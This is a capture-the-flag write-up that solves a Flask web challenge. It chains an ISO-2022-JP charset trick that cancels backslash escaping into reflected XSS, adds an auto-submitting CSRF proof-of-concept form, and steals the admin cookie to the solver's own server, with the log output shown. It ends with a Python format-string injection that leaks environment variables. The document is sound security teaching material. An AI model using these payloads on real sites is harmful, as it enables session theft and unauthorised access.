As we can see, very few files are present for this challenge. It contains very little: a page with a field meant to hold a first name reflected in a modal and a restricted /admin route.
From the source code, to solve the challenge, we need to leak the $FLAG environment variable.
To solve the challenge, we need to exploit an issue related to the lack of charset specification in the server’s response on one of the routes. This allows injecting JavaScript code into the page to leak the admin’s cookie. Finally, on the /admin route, via a vulnerable format string, it is possible to leak environment variables, including the flag.
Code Analysis
Before finding how to solve the challenge, we first need to understand the source code.
app.py
from flask import Flask, render_template, request, Response, redirect, url_for
from bot import visit_report
from secrets import token_hex
X_Admin_Token = token_hex(16)
defrun_cmd(): # I will do that laterpassdefsanitize_input(input_string):
input_string = input_string.replace('<', '')
input_string = input_string.replace('>', '')
input_string = input_string.replace('\'', '')
input_string = input_string.replace('&', '')
input_string = input_string.replace('"', '\\"')
input_string = input_string.replace(':', '')
return input_string
app = Flask(__name__)
@app.route('/admin', methods=['GET'])
defadmin():
if request.cookies.get('X-Admin-Token') != X_Admin_Token:
return'Access denied', 403 prompt = request.args.get('prompt')
return render_template('admin.html', cmd=f"{prompt if prompt else'prompt$/>'}{run_cmd()}".format(run_cmd))
@app.route('/', methods=['GET'])
defindex():
return render_template('index.html')
@app.route('/your-name', methods=['POST'])
defyour_name():
if request.method =='POST':
name = request.form.get('name')
return Response(render_template('your-name.html', name=sanitize_input(name)), content_type='text/html')
@app.route('/report', methods=['GET'])
defreport():
url = request.args.get('url')
if url and (url.startswith('http://') or url.startswith('https://')):
print(f'Visit : {url} | X-Admin-Token : {X_Admin_Token}')
visit_report(url, X_Admin_Token)
return redirect(url_for('index'))
app.run(debug=False, host='0.0.0.0')
We see in the script that there are 4 routes:
/
/admin
/report
/your-name
All of them are accessible except /admin. A /report route is present, allowing the admin to be notified of a URL, which is typical of challenges with client-side vulnerabilities. Then we see that the /your-name route takes a parameter: name (via POST) which is then “sanitized” by a custom function and returned in the page. However, this is the only route that returns a Response object. Especially since the Content-Type is specified as text/html without a charset.
We see that the value of name is reflected in the page twice. Once in the href attribute and once in onfocus. However, they are not reflected in the same way. One is marked as “safe” while the other is not; the one used in onfocus is the key to solving our challenge. However, even if the safe filter is used, it is normally not possible to escape the double quotes to inject JavaScript code, as the sanitize_input() function escapes double quotes. Unless the charset is not specified in the response…
Canceling Backslash Escaping
To escape the double quotes, the browser must detect the encoding used as ISO-2022-JP. This encoding is necessary because it can switch between 4 character sets: ASCII, JIS X 0201 1976, JIS X 0208 1978, and JIS X 0208 1983.
This feature of the ISO-2022-JP standard offers great flexibility but can also be used to cancel the escaping performed by the backslash on quotes. A single occurrence of one of these escape sequences is usually enough to convince the auto-detection algorithm that the body of the HTTP response is encoded with the ISO-2022-JP standard.
If a user uses the bytes: 0x1b, 0x28, and 0x4a, it will switch character sets to JIS X 0201-1976. The JIS X 0201 1976 standard is mostly ASCII-compatible. However, two bytes differ between the ASCII table and the JIS X 0201 code table:
The byte 0x5c corresponds to the character ¥ here, whereas in ASCII it corresponds to \, and the byte 0x7e corresponds to the character ‾ here, whereas in ASCII it corresponds to ~. It is therefore possible to avoid escaping via \ thanks to the escape sequence of JIS X 0201 1976. Indeed, if I send ESC ( J or %1b%28%4a followed by ", then \ will be translated to ¥, which will cancel the escaping of the backslash.
By intercepting the POST request to /your-name, modifying the name parameter to %1b%28%4a"payload, and displaying the response in Firefox (the one used by bot.py), we get the expected result.
We see here that we have successfully escaped the double quotes in the onfocus attribute.
Bonus (unintended): It was also possible to cancel the escaping on double quotes simply with \".
Cross-site request forgery
We now know that it is possible to inject JavaScript code into the page. However, the name parameter reflected in the page must be sent via POST. Since there is no protection against CSRF and name is sent via application/x-www-form-urlencoded, it is possible to CSRF to trigger our RXSS via POST.
To generate our payload, we can use burpsuite, which generates it for us, not forgetting to add #behindthename-redirect at the end of the action attribute:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional --> <body>
<formaction="http://localhost:5000/your-name#behindthename-redirect"method="POST">
<inputtype="hidden"name="name"value="(J";alert(0);" />
<inputtype="submit"value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
If we test the CSRF in our browser, we indeed trigger our RXSS with our alert(0):
However, the redirection poses a problem. Indeed, if we want to do more than a simple “alert”, we need to obtain a slower redirection or cancel it.
Leak the admin cookie via Cross-Site Scripting
Now that we know how to trigger our RXSS, we need to leak the admin’s cookie. For this, we need to use String.fromCharCode to bypass characters blocked by sanitizer_bypass. We also need to modify the redirection; for this, we can use the small trick [0]='#', which will replace the redirection URL with #, preventing the page from reloading and thus executing our RXSS.
Then, we simply need to retrieve the cookie and send it to our server. By scripting all the steps so far, we get this kind of script:
Simply run the program and visit the /exploit route to launch the attack. On our Flask, we indeed receive the admin’s cookie:
$ python solver2.py
* Serving Flask app 'solver2'
* Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:1337
* Running on http://192.168.1.38:1337
Press CTRL+C to quit
127.0.0.1 - - [28/Feb/2025 19:41:43] "GET /csrf HTTP/1.1" 200 -
[+] Cookie : X-Admin-Token=ca92c81597f1956c580ecae73324591a
127.0.0.1 - - [28/Feb/2025 19:41:43] "GET /recv-cookie?r=WC1BZG1pbi1Ub2tlbj1jYTkyYzgxNTk3ZjE5NTZjNTgwZWNhZTczMzI0NTkxYQ== HTTP/1.1" 200 -
127.0.0.1 - - [28/Feb/2025 19:41:44] "GET /exploit HTTP/1.1" 200 -
We indeed have access to the /admin page with the leaked cookie:
To leak the flag, we need to exploit a bug concerning format strings in Python. Indeed, it is possible to inject expressions when an fstring is used with the format method on the same string.
This is what happens on the /admin route:
@app.route('/admin', methods=['GET'])
defadmin():
if request.cookies.get('X-Admin-Token') != X_Admin_Token:
return'Access denied', 403 prompt = request.args.get('prompt')
return render_template('admin.html', cmd=f"{prompt if prompt else'prompt$/>'}{run_cmd()}".format(run_cmd))
We see here a function passed as a parameter, which we will rely on to access os.environ and leak the FLAG environment variable. For this, we will go through FLASK since it imports os.